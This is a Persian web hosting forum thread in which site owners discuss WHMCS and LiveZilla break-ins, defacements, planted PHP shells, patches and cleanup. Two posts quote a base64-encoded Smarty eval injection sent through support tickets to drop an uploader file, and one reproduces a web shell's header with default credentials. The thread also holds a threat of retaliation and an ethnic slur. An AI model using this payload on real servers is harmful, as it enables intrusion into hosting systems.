سلام دوستان الان ساعت 50:20 دقیقه صبحه

داشتم سایت رو آپدیت میکردم . رو سی پنل بودم که یه دفعه متوجه جند تا فایل مشکوک شدم / اولین کاری که کردن خونسردیه خودمو حفظ کردم بعد سریعا اون 2 تا فایل شل رو پاک کردم و فولدر whmcs رو اصلا نگاه نکردم همشون ریختم تو زیپ ، فولدر بازشو هم سریع پاک کردم . سریع رفتم دیدم تو لایو زیلا هم شل ریخته . اون فولدر رو همین کار کردم . برگشتم بیرون روت دیدم اون 3 تا فولدری که تو آموزش پچ امنیتی زده بود اونارو هم دسترسی پیدا کرده . ولی قبل از اینکه کاری کنه سریع جلوشو گرفتم یه اسکرین شات از هک کردنشون میزارم تا ببنید

حالا باز بگید whmcs باگش حل شده . از من میشنوید همین الان بگردید مشکلش رو پیدا کنید از من گفتن بود . شانسی که آوردم من یه دامین دیگه زدم و جدا از این سایته . تمام یوزرنیم و پسورد ها رو از طریق اون ادرس ، ایمیل میکردم تو سیستم whmcs فقط کار حسابداری انجام می دادم و بهتره به عصر قجر برگردیم و از فرم های واریز فیش بانکی استفاده کنیم بهتره تا یه جوجه هکر بیاد این کار هارو انجام بده

اسکرین شات رو پیوست کردم

کد دیفیس رو هم تو یه html براتون گذاشتم که ببنید چه طوری بوده

راستی یادم رفت بگم که من بچ امنیتی رو کامل و بدون نقص نصب کرده بودم . بچه ها حواستون جم باشه . که شب نیان سراغ سایت شما

با صحبت و مذاکره ای که با تیم امنیتی http://www.black-hg.org داشتم . گفتن که این هک کار ما نبوده و هیچ دخالتی ما در این هک نداشتیم . البته قابل ذکر هست که لینک سایت و لینک zone یه اسم این تیم ثبت شده بود . احتمالا یکی می خواسته اسم این گروه رو خراب کنه

مطمون باش باگ نداره. مشکل 100 درصد از جای دیگه ای بوده.

مطمون باش باگ نداره. مشکل 100 درصد از جای دیگه ای بوده.

مطمعا باش هست . من ریز ، ریز همه جاهاشو قبلا چک کرده بودم .

اونوقت توی پوشه لایو زیلا چه جوری شل ریخته؟ این همه whmcs دیگه. چرا اونا هک نشده؟؟

اونوقت توی پوشه لایو زیلا چه جوری شل ریخته؟ این همه whmcs دیگه. چرا اونا هک نشده؟؟


داداش من . فکر کرده بود من فردا صبح میام فقط whmcs رو عوض میکنم . که بتونه بعدا دوباره وارد میشه

از طریق whmcs وارد شده بود .

بعد اومده بود تو فولدر لایو زیلا اونجا هم جدا ریخته بود که بعدا هم بتونه بیاد . فکر نمی کرد که من زرنگ تر از اونم

تیم whmcs یک سال بیشتر میشه که توی آموزشهاش گفته سه تا فولدر حساس رو بیارید خارج روت سایت. اگه کاربرا همین یک مورد رو رعایت می کردن حتی باگ خطرناک دو هفته پیش هم موثر نبود و کسی کاری نمیتونست بکنه

تیم whmcs یک سال بیشتر میشه که توی آموزشهاش گفته سه تا فولدر حساس رو بیارید خارج روت سایت. اگه کاربرا همین یک مورد رو رعایت می کردن حتی باگ خطرناک دو هفته پیش هم موثر نبود و کسی کاری نمیتونست بکنه

من پچ رو نصب کرده بودم حتی اون روز که نصب کردم کل فایل هامو چک کردم که مشکل نداشته باشه . از اون روز بالای 10 تا کد base64 اومده بود هیچ کدوم تاثیر نداشتن . این یکی واسم خیلی جالب بود که از کجا اومده تو سی پنل ؟ :104:

باگ قبلی whmcs طوری بود که هکر حتما باید فایلی که در پوشه downloads ساخته شده رو اجراش میکرد. وقتی این پوشه خارج از روت باشه، نمیتونه اجراش کنه و خنثی میشه.

وقتی به خارج از روت هم دسترسی پیدا کرده به احتمال زیاد هک شما از ناحیه دیگه ای بوده

باگ قبلی whmcs طوری بود که هکر حتما باید فایلی که در پوشه downloads ساخته شده رو اجراش میکرد. وقتی این پوشه خارج از روت باشه، نمیتونه اجراش کنه و خنثی میشه.

وقتی به خارج از روت هم دسترسی پیدا کرده به احتمال زیاد هک شما از ناحیه دیگه ای بوده

من رو هاستم هیچ چیزی جز whmcs ندارم

لایوزیلا که دارید.
خود هاست هم هست.
سیستم خودتون هم هست.
سایتهایی که در کنار شما میزبانی شدن هم هست.
و..و..و..

لایوزیلا که دارید.
خود هاست هم هست.
سیستم خودتون هم هست.
سایتهایی که در کنار شما میزبانی شدن هم هست.
و..و..و..

نه من هاست به کسی نمیدادم

لایوزیلا رو هم مطمعا هستم باگ نداره و الی ال الان بیشتر سایتها هک میشدن . شرمنده من نمی تونم دیگه بمونم تو سایت چون دقیقا از ساعت 9 صبح دیروز تا الان که 6:12 دقیقه هست بیدارم . ببخشید دیگه . من یه خورده به استراحت نیاز دارم

نه من هاست به کسی نمیدادم

لایوزیلا رو هم مطمعا هستم باگ نداره و الی ال الان بیشتر سایتها هک میشدن . شرمنده من نمی تونم دیگه بمونم تو سایت چون دقیقا از ساعت 9 صبح دیروز تا الان که 6:12 دقیقه هست بیدارم . ببخشید دیگه . من یه خورده به استراحت نیاز دارم


استراحت بده به خودت مهندس. صبحت بخیر. خوابهای طلایی ببینی...

ولی اینو بدون اگه اون سه فولدرو پشت روت ببری هرگز هک نمیشی

ولی اینو بدون اگه اون سه فولدرو پشت روت ببری هرگز هک نمیشی

البته درستش اینه که بگیم "از اون طریق خطرناک هک نمیشه"

چون ممکنه از طرق دیگه بشه هکش کرد. ایشون هم مطمئنا از یه طریق دیگه ای غیر از اون باگ خطرناک هک شده.

از كجا مطمئنيد كه دسترسي جديدي ايجاد شده ؟
وقتي هكر يكبار روي سايت شما نفوذ كرد ، 1000 راه براي مخفي كردن شل داره.دليلي نداره خود شل روي سرور وجود داشته باشه ، كافيه هر كدوم از فايل هاي شما رو ويرايش كنه ، ممكنه راه نفوذ رو در ديتابيس قرار بده .
ممكنه دسترسي در 1 الي 2 خط كد اضافي در هر كدوم از فايل هاي شما باشه ، ونه لزوما فايل هاي php ، فايل هاي عكس و ... گزينه مناسبي براي ذخيره كردن راه دسترسي هستند.
بهترين راه اينه كه شما كل فايل هايي كه نسخه اصلشون وجود داره رو پاك و دوباره آپلود كنيد.مابقي فايل ها به دقت چك بشند.
بررسي بشه كه هيچ پسوند غير استانداردي اجازه اجرا داره
امكان آپلود فايل توسط كاربر، هميشه يك تهديد به وجود مي آد و در طول زمان باگ هاي متعددي شناسايي شده (يا سهل انگاري برنامه نويس ،‌يا سطح بالاتر.)
در صورت امكان بهتره امكان آپلود فايل رو كلا از يوزر روي سرور اصلي ميزباني سايت خودتون بگيريد و فايل هاي اتچ و ... مشتريان روي سرور ديگه اي آپلود بشند.
اگر whmcs هم اين امكان رو نداشته باشه كد نويسيش نه خيلي پيچيدست و نه غير معقول
با خود شل ها هم بايد اساسي تر برخورد كرد ، من از سرور شما خبر ندارم اما در بسياري از سرور هايي كه ديدم امنيت يعني بستن 4 تابع و روشن كردم safe mode !
براي امنيت سرور مقالات زيادي وجود داره ولي كافي نيست، يك مثل معروف هست كه ميگه امنيت رابطه ي مستقيمي با $ داره !
بعد از ايجاد اولين دسترسي موارد بسيار زيادي رو بايد بررسي كرد.

ولی اینو بدون اگه اون سه فولدرو پشت روت ببری هرگز هک نمیشی


من تو نوشته های قبلم گفتم که من یعد از اینکه بچ کامل و درست رو انجام داده بودم . نزدیک به 10 بار base64 برای من اومده بود ولی کاری نتونسه بودن بکنن دیروز برام عجیب بود به غیر از whmcs فایل دیگه ای نداشتم که بخوان از اون طریق وارد بشن

---------- Post added at 10:41 AM ---------- Previous post was at 10:40 AM ----------


البته درستش اینه که بگیم "از اون طریق خطرناک هک نمیشه"

چون ممکنه از طرق دیگه بشه هکش کرد. ایشون هم مطمئنا از یه طریق دیگه ای غیر از اون باگ خطرناک هک شده.


منم هم دقیقا اینو میگم که از همون راه ولی روش دیگه وارد شده

قبلا یه بار هک شده بودی؟

از كجا مطمئنيد كه دسترسي جديدي ايجاد شده ؟
وقتي هكر يكبار روي سايت شما نفوذ كرد ، 1000 راه براي مخفي كردن شل داره.دليلي نداره خود شل روي سرور وجود داشته باشه ، كافيه هر كدوم از فايل هاي شما رو ويرايش كنه ، ممكنه راه نفوذ رو در ديتابيس قرار بده .
ممكنه دسترسي در 1 الي 2 خط كد اضافي در هر كدوم از فايل هاي شما باشه ، ونه لزوما فايل هاي php ، فايل هاي عكس و ... گزينه مناسبي براي ذخيره كردن راه دسترسي هستند.
بهترين راه اينه كه شما كل فايل هايي كه نسخه اصلشون وجود داره رو پاك و دوباره آپلود كنيد.مابقي فايل ها به دقت چك بشند.
بررسي بشه كه هيچ پسوند غير استانداردي اجازه اجرا داره
امكان آپلود فايل توسط كاربر، هميشه يك تهديد به وجود مي آد و در طول زمان باگ هاي متعددي شناسايي شده (يا سهل انگاري برنامه نويس ،‌يا سطح بالاتر.)
در صورت امكان بهتره امكان آپلود فايل رو كلا از يوزر روي سرور اصلي ميزباني سايت خودتون بگيريد و فايل هاي اتچ و ... مشتريان روي سرور ديگه اي آپلود بشند.
اگر whmcs هم اين امكان رو نداشته باشه كد نويسيش نه خيلي پيچيدست و نه غير معقول
با خود شل ها هم بايد اساسي تر برخورد كرد ، من از سرور شما خبر ندارم اما در بسياري از سرور هايي كه ديدم امنيت يعني بستن 4 تابع و روشن كردم safe mode !
براي امنيت سرور مقالات زيادي وجود داره ولي كافي نيست، يك مثل معروف هست كه ميگه امنيت رابطه ي مستقيمي با $ داره !
بعد از ايجاد اولين دسترسي موارد بسيار زيادي رو بايد بررسي كرد.

تمام گفته هاتون درست ولی من با پشتیبان سرور صحبت کردم که هیچ فایل یا گزارش هک تو سرور های اونا نشده . البته نه این که نخوان نگن . چون من ایشون را کاملا میشناسم . دروغ نمیگن

---------- Post added at 10:44 AM ---------- Previous post was at 10:42 AM ----------


قبلا یه بار هک شده بودی؟

نه من هک نشده بودم . کلا من تو این 11 سال کارم 2 بار هک شدم که یه باز 5 سال پیش با phpnuke هک شدم . و یه بار دیگش هم دیشب

خب لاگها رو نگاه کن دیگه. چرا اینقد دنبال جواب میگردی؟

خب لاگها رو نگاه کن دیگه. چرا اینقد دنبال جواب میگردی؟


خوب همین کار رو الان شروع کردم انجام بدم . چون مطمعن هستم که از طریق whmcs وارد شده

سلام دوستان از دیروز 3 بار این تیکت رو برام فرستادن
میخواستن هکم کنن
اما به بن بست خوردن مثل اینکه


<form method="post">
<textarea name="TextArea1" style="width: 653px; height: 82px">: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php</textarea></form>




درست حدس زدم ؟

سلام دوستان از دیروز 3 بار این تیکت رو برام فرستادن
میخواستن هکم کنن
اما به بن بست خوردن مثل اینکه


<form method="post">
<textarea name="TextArea1" style="width: 653px; height: 82px">: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php</textarea></form>




درست حدس زدم ؟


واسه من تیکت نیومده . دیشب مستقیم وارد هاست شده بودن . فایل whmcs رو که دیشب تو زیپ گذاشته بودم رو الان دانلود کردم رو پی سی . فابل رو با ویروس کش اسکن کردم . ویروس کش کل زیپ رو پاک کرد احتمالا کل فایل ها مشکل پیدا کردن .

ورژن جدید رو نصب کنید
بعد هم اون سه تا پوشه رو ببرید تو قبل از روت بذارید
دیگه هیچ مشکلی نیس
خودتونم به خودتون از این تیکت ها بزنید
سوپرایز : دانلود whmcs v5.0.3 و قالب شمسی و راست چین دیفالت (http://www.webhostingtalk.ir/f178/36909)

من که هم پچ رو گذاشتم
هم دسترسی فایل supportticket رو صفر کردم
بازم کاری که maryam1 گفتن انجام میدم

پچ رو بیخیال ورژن جدیدو بچسب یه نکنه تو ورژن جدید فایل function.php داخل پوشه اصلی حذف شده و فقط داخل include هست
اونو باید حذف کنید
پچو بیخیال حتما ورژن جدیدو نصب کنید و ایل function.php رو از محل نصب whmcs حذف کنید
اون سه پوشه رو هم ببرید پشت روت
من در طول روز 15 تا برام ازین تیکت ها میاد منم دارم بانک اطلاعاتی آیپی جمع میکنم
کلا یه وسیله سرگرمی شده برام

پچ رو بیخیال ورژن جدیدو بچسب یه نکنه تو ورژن جدید فایل function.php داخل پوشه اصلی حذف شده و فقط داخل include هست
اونو باید حذف کنید
پچو بیخیال حتما ورژن جدیدو نصب کنید و ایل function.php رو از محل نصب whmcs حذف کنید
اون سه پوشه رو هم ببرید پشت روت
من در طول روز 15 تا برام ازین تیکت ها میاد منم دارم بانک اطلاعاتی آیپی جمع میکنم
کلا یه وسیله سرگرمی شده برام

حالبش اینه که همشون با وی - پی - ان وارد می شن که شناسایی نشن

من رو یه هفته پیش عرب های ....... هک کرده بودن :-&

نمایش مشخصات: badnam_051 - انجمن تخصصی وب هاستینگ ایران (http://www.webhostingtalk.ir/member/7536/)

ادمین بلک هت گروپ در وبهاستینگ تالک . میتونید از نزدیک ارتباط برقرار کنید اما شواهد نشون میده که این دیفیس کار این تیم نبوده به 2 دلیل :
1. این دیفیس پیج رسمی این تیم نیست
2.اسامی کسانی که در عکس بودند عضو رسمی این تیم نیستند

بازم باهاشون صحبت کنید اگر از طرف این تیم باشه برای پچ کردن باگ امنیتی موجود در سایتتون بهتون کمک میکنن
اینقدر هم روی whmcs حساس نباشید

موفق باشید

من رو یه هفته پیش عرب های ....... هک کرده بودن :-&


بابا باز اون عرب کث یف بوده . ولی یه ایرانیه بیاد . بخواد با هم وطن خودش این کارو کنه خیلی زورش . میاد . حالا تو سایت خودشون زدن که ما از فقط سایت های خارجی رو هک می کنیم

آره والا
حالا بیاد هک کنه
من که دیگه بک آپ روزانه میگیرم :d

دوست عزیز
همون طور که جناب rezash فرمودن
1. اینجاست که بسته بودن برخی توابع کار ساز است
2. بعد از نفوذ هکر اگه کمی وارد باشه بک دور یا همین راه های نفوذ متعدد برای نوبت بعد باز میکنه روی هدف که به احتمال زیاد روی سایت شما این مورد اتفاق افتاده
برای اینکه خیالتون راحت باشه اول کل فایل های داخل پوشه public_html رو با فایلهای اولیه whmcs که نصب میکنید جایگزین کنید (بک اپ از دیتابیس و ... فراموش نشه که ...)
بعد پسورد ها رو عوض بکنید و ببینید یوزر های دیگه ای ایجاد نشده.
سپس مراحل امنیتی لازم برای سیستم رو انجام بدید

امکانش هست دیتا بیس رو هم آلوده کرده باشه؟

امکانش هست دیتا بیس رو هم آلوده کرده باشه؟

دیتابیس آلوده یعنی این که توی سیستم whmcs یوزر ایجاد کرده باشه یا تنظیمات امنیتی سیستم رو تغییر داده باشه مثلا امکان اپلود فایل با فرمت خاص رو باز کرده باشه و.. (با whmcs کار نکرده ام)

سلام ،

ما هم از دیشب که سرور رو بررسی می کنیم متوجه شدیم هکر موفق شده چند تا فایل روی سرور ما آپلود کنه
دیشب فایل r57shell آپلود شده بود.
پاک کردم و تمام پسورد ها هم تغییر دادم. ویروس اسکن هم کردم خبری نبود.
امروز با آنتی ویروس اسکن انجام شد و متوجه شدم دو تا فایل به اسم های s2.php , sy.php داخل یکی از پوشه هامون آپلود و مخفی شده که آنتی ویروس پیداش کرد و پاکش کردم.

یکی از شل ها جهت ارسال اسپم بود (فکر کنم به تمام ایمیل های سرور)
دومی هم وقتی باز میکردی ، یک صفحه مشکی بود و یوزر و پسورد می خواست!
جالب اینجاست که وقتی که خودم می خواستم فایل ها رو آپلود کنم آنتی ویروس اجازه نداد.
یعنی هکر تونسته فایروال و آنتی ویروس رو دور بزنه.

روی سیستم لایوزیلا هست و whmcs
whmcs نسخه 4.5 همین چند روز پیش از سایت خودش با لایسنس دانلود و نصب کردم (یعنی تمام پچ ها رو داره)
لایوزیلا هم که نسخه 3.2 هست.
خوشبختانه ما فقط دیفیس شدیم و اطلاعات در امان هستند.
اما چطور این مشکل به وجود آمده ؟
لازم به ذکره ما روی این سرور فقط خودمون هستیم و به کس دیگه ای هاست ندادیم!
safe_mode روشن هست.
تا جایی هم که شده توابع رو مسدود کردیم.
مشکل از کجا می تونه باشه ؟

نکته : فایل هایی که هکر اپلود کرده بود خارج از پوشه whmcs بودند.

نکته : قبلاً خودم تست کردم ، با شل r57 تونستم روی سرورم فایل write کنم ، اما بعد از بستن چند تا تابع ، این امکان هم از این شل گرفته شد. الان مشکل کجاست ؟

بالای شل هایی که اپلود شده بود اینا رو نوشته بودن :



<?php # syrian shell is a php evil script , please use it against Israel Only . # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. SyRiAn Sh3ll V1 .... sy34[at]msn[dot]com # `+---------------------------^----------| # `\_,-------, __EH << SyRiAn | 34G13__| # / XXXXXX /`| / # / XXXXXX / `\ / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------ # # SyRiAn Sh3ll V1 . # Copyright (C) 2010 - SyRiAn 34G13 # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or (at your option) any later version. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! . # next version ( upload files , chmod force , read files , no security , bypass , cgi , server shourtcut , eval , forbidden) $uselogin = 1; // Make It 0 If you Want To Disable Auth $user = 'root'; // Username $pass = 'toor'; // Password #---------------------------------------------------------------# # Powered By SyRiAn Shell # # By EH SyRiAn 34G13 # # wWw.syrian-shell.com # # Version 1 # # Made In SyRiA # # 20\10\2010 # #---------------------------------------------------------------#

whmcs نسخه 4.5 همین چند روز پیش از سایت خودش با لایسنس دانلود و نصب کردم (یعنی تمام پچ ها رو داره)


whmcs که آپدیت نکردی
الان نسخه 5.0.3 اومده

خوب فرقی نمی کنه چه 4.5 باشه و چه 5.0.3 :74:

---------- Post added at 04:17 PM ---------- Previous post was at 04:12 PM ----------




خوشبختانه ما فقط دیفیس شدیم و اطلاعات در امان هستند.
اما چطور این مشکل به وجود آمده ؟
لازم به ذکره ما روی این سرور فقط خودمون هستیم و به کس دیگه ای هاست ندادیم!
safe_mode روشن هست.

نکته : فایل هایی که هکر اپلود کرده بود خارج از پوشه whmcs بودند.

[/CODE]


دقیقا هم همین اتفاق برای من افتاده امکان داره از صفحه ی دیفیس یه اسکرین شات بدی . من تو صفحه اصلی گذاشته بودن

whmcs که آپدیت نکردی
الان نسخه 5.0.3 اومده

در سایت whmcs نوشته تمام پچ ها در همه نسخه ها اعمال شد است...
مشکل خاصی شما پیدا کردید ؟

خوب فرقی نمی کنه چه 4.5 باشه و چه 5.0.3 :74:


نسخه 4.5 تمام پچ ها رو نداره!!
باید پچ رو جدا دانلود و نصب کرد

whmcs نسخه 4.5 همین چند روز پیش از سایت خودش با لایسنس دانلود و نصب کردم (یعنی تمام پچ ها رو داره)

---------- Post added at 04:22 PM ---------- Previous post was at 04:20 PM ----------

دانلود و نصب کن (1 دقیقه هم طول نمیکشه)
WHMCS - Security Patch (http://blog.whmcs.com/?t=43462)

بنده ادمین black-hg.org هستم میشه بپرسم اقای vps-baran.ir به چه دلیل اسم سایت مارو اینجا مطرح کردی؟!
اولا شما در حدی نیستی که بخواییم هکت کنیم.
دوما تیم ما سایت ایرانی هک نمیکنه.
سوما اون اشخاصی که تو پیج دیفس هستن میشه بپرسم چه ربطی به تیم ما داره؟
این رو بدونید با این کارتون فقط واسه خودتون دشمن درست کردید و منتظر باشد سزای عملتون رو ببینید.

اگر دقت کنید پایین همین ، اینو نوشته :


* All client area downloads have been updated to include this by default

من whmcs رو بعد از انتشار این پچ دانلود و نصب کردم ...

من whmcs رو بعد از انتشار این پچ دانلود و نصب کردم ...
خوب اگه بعد انتشار پچ، whmcs دانلود کردید درسته نیاز به پچ مجدد نیست

منتظر باشید سزای عملتون رو ببینید.

:105:

---------- Post added at 04:40 PM ---------- Previous post was at 04:36 PM ----------


خوب اگه بعد انتشار پچ، whmcs دانلود کردید درسته نیاز به پچ مجدد نیست

ببنید قضیه پچ کردن نیست از جای دیگه وارد شدن

دوستمون هم اینو میگه

:105:

---------- Post added at 04:40 PM ---------- Previous post was at 04:36 PM ----------



ببنید قضیه پچ کردن نیست از جای دیگه وارد شدن

دوستمون هم اینو میگه

هر دوی ما هک شدیم د حالی که لایوزیلا داریم
این در حالی هست که whmcs دار ها هنوز هک نشدن
من فعلاً لایوزیلا رو پاک می کنم ...

livezilla رو سایتتون فعاله؟
اون رو هم باید آپدیت کرد
ببینید از نسخه 3.2 تا 4.0.1 چقدر تغییر ایجاد شده: LiveZilla.net &bull; View topic - LiveZilla Changelog (http://www.livezilla.com/forum/viewtopic.php?f=11&t=240)

هر دوی ما هک شدیم د حالی که لایوزیلا داریم
این در حالی هست که whmcs دار ها هنوز هک نشدن
من فعلاً لایوزیلا رو پاک می کنم ...

نه من از لایوزیلا نخوردم . چون whmcs که دیشب ریخته بودم تو زیپ صبح دانلود کردم رو سیستم خودم . بعد با ویروس کش اسکن کردم عوض اینکه فایل شل رو پاک کنه . کل فایل زیپ رو پاک کرد

اینقدر با قاطعیت صحبت می کنید هر کی ندونه فکر می کنید نعوذ بالله خدا هستید.

خب اگه از هیچ جا نبوده و فقط از whmcs بوده پش چرا بقیه هک نشدن؟ آخه فقط ایرانیا که ازش استفاده نمی کنند اینهمه نفر توی دنیا. اگر هم از whmcs هک شدید پس 100 درصد موارد امنیتی رو رعایت نکردید. از این حالات خارج نیست. یه کم غرورتونو بیارید پایین. از یه فولدر ساده هم ممکنه هکر بتونه وارد بشه

اینقدر با قاطعیت صحبت می کنید هر کی ندونه فکر می کنید نعوذ بالله خدا هستید.

خب اگه از هیچ جا نبوده و فقط از whmcs بوده پش چرا بقیه هک نشدن؟ آخه فقط ایرانیا که ازش استفاده نمی کنند اینهمه نفر توی دنیا. اگر هم از whmcs هک شدید پس 100 درصد موارد امنیتی رو رعایت نکردید. از این حالات خارج نیست. یه کم غرورتونو بیارید پایین. از یه فولدر ساده هم ممکنه هکر بتونه وارد بشه


عزیزم من از اون موقعه که پچ کرده بودم حدود 10 تا از این تیکت ها اومده بود . اون تیکت های قبلی تاثیر نداشت ولی صبح . تیکت نیومده بود .

قرار نیست حتما از تیکت شما هک بشید. اینهمه راه.
ضمنا آنتی ویروس محتوای فایل شل رو که نمیتونه شناسایی کنه. فقط در یک صورت این فایل ها رو تشخیص میده که این فایل اجرا بشه.

عزیزم من از اون موقعه که پچ کرده بودم حدود 10 تا از این تیکت ها اومده بود . اون تیکت های قبلی تاثیر نداشت ولی صبح . تیکت نیومده بود .
اگه خواستید دسترسی سی پنل رو بدید یک نظری بکنیم:d

اگه خواستید دسترسی سی پنل رو بدید یک نظری بکنیم:d


ممنون از لطفتون خودم دوباره نصب می کنم

---------- Post added at 06:03 PM ---------- Previous post was at 05:55 PM ----------

با صحبت و مذاکره ای که با تیم امنیتی http://www.black-hg.org (http://www.black-hg.org/) داشتم . گفتن که این هک کار ما نبوده و هیچ دخالتی ما در این هک نداشتیم . البته قابل ذکر هست که لینک سایت و لینک zone یه اسم این تیم ثبت شده بود . احتمالا یکی می خواسته اسم این گروه رو خراب کنه

لایو زیلارو منم دارم هک نشدم
خیلی ها دارن ورژن جدیدش پولیه همه از ورژن قدیمی استفاده میکنن

لایو زیلارو منم دارم هک نشدم
خیلی ها دارن ورژن جدیدش پولیه همه از ورژن قدیمی استفاده میکنن

خیلی ها از ورژن پولی استفاده میکنن ;)

با صحبتی که با این گروه امنیتی داشتم گفتن که روش کامل جلوگیری از نفوذ به whmcs رو گذاشتن . شما هم میتونید یه نگاهی بندازید

Black Hat Group (http://www.black-hg.org/cc/showthread.php?t=1118)

با صحبتی که با این گروه امنیتی داشتم گفتن که روش کامل جلوگیری از نفوذ به whmcs رو گذاشتن . شما هم میتونید یه نگاهی بندازید

Black Hat Group (http://www.black-hg.org/cc/showthread.php?t=1118)

شما نمیتوانید وارد سایت شوید ! دسترسی شما به سایت به دلیل زیر قطع شده است :
هیچ دلیلی اتخاذ نشده است

مطلبش رو با ذكر منبع اينجا بزاريد
حوصله نداريم ثبت نام كنيم :d

مطلبش رو با ذكر منبع اينجا بزاريد
حوصله نداريم ثبت نام كنيم :d


به درخواست دوستان نحوه پچ باگ رو در WHMCS اموزش دادم.
با تشکر از ارش شمس بابت دادن دسترسی برای تست.
موفق باشید.

کد:

پرشین گیگ - دانلود - Whmcs.rar (http://sysn3t.persiangig.com/video/Whmcs.rar)


منبع : Black Hat Group (http://www.black-hg.org/cc/showthread.php?t=1118)

چیز خاصی نیست ! فقط برای بعضی ها ممکنه بدآموزی داشته باشه ! اما بازم دستشون درد نکنه ، درسته که آموزشش قبلاً هم مطرح شده بود اما این ورژن ویدئویی هم کامله هم اینکه افکت های خیلی جالبی روش بود خوشم اومد. ...

این هکر سایت ما خودشو لو داد اینم ایدی و نوشته های چتش

the_________siamak@att.net

این هکر سایت ما خودشو لو داد اینم ایدی و نوشته های چتش

the_________siamak@att.net

خیلی چت باهالی بود
خداییش هکره کارش خیلی درسته باید ترسید ازش :d :109:

عجب ادمای ال...فی

whmcs یک باگ 0day داره روی قسمت دپارتمان ها ...
اونا رو فقط مخصوص کاربر های خودتون کنید
حتی تو اخرین نسخه هم تست شد باگ موجوده ...

باگ 0day رو کسی داره؟
یا نحوه پچ کردنش رو...!؟

باگ 0day رو کسی داره؟
یا نحوه پچ کردنش رو...!؟

اگه این باگ ها بسته نشن مشکلی پیش میاد؟

whmcs یک باگ 0day داره روی قسمت دپارتمان ها ...
اونا رو فقط مخصوص کاربر های خودتون کنید
حتی تو اخرین نسخه هم تست شد باگ موجوده ...

بیشتر توضیح بدید

whmcs یک باگ 0day داره روی قسمت دپارتمان ها ...
اونا رو فقط مخصوص کاربر های خودتون کنید
حتی تو اخرین نسخه هم تست شد باگ موجوده ...


لطفا توضیحات کامل رو بگین تا سیستم رو ما هم امن کنیم.

لطفا توضیحات کامل رو بگین تا سیستم رو ما هم امن کنیم.

دوستان بهترین راه حل اینه که سیستم تیکت رو کلا جم کنید و از طریق ایمیل کار کنید

چون من از قسمت تیکت ضربه می خوردم

و از اون موقعی که دیگه قسمت تیکت رو ندارم . هیچ مشکلی برام پیش نیومده

به درخواست دوستان نحوه پچ باگ رو در WHMCS اموزش دادم.
با تشکر از ارش شمس بابت دادن دسترسی برای تست.
موفق باشید.

کد:

پرشین گیگ - دانلود - Whmcs.rar (http://sysn3t.persiangig.com/video/Whmcs.rar)


منبع : Black Hat Group (http://www.black-hg.org/cc/showthread.php?t=1118)

لینکی که گذاشتین فکر میکنم ریپورت شده!

لینکی که گذاشتین فکر میکنم ریپورت شده!

نه من چک کردم سالمه

